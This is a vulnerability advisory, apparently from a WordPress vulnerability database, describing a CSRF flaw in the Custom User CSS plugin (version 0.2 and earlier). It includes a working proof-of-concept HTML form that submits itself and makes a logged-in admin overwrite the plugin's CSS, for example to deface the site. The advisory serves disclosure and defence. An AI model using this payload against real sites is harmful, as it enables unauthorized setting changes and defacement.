WordPress Plugin Vulnerabilities
Custom User CSS <= 0.2 - Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
Proof of Concept
Create an HTML form with the following content and make a logged in admin open it <form action="https://example.com/wp-admin/themes.php?page=custom-user-css/custom_user_css.php" method="POST"> <input type="text" name="custom_user_css_css" value="overwritten css, for example for defacement"> <input type="text" name="action" value="update"> <input type="text" name="page_options" value="custom_user_css_css"> </form> <script> document.forms[0].submit(); </script>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-04 (about 4 months ago)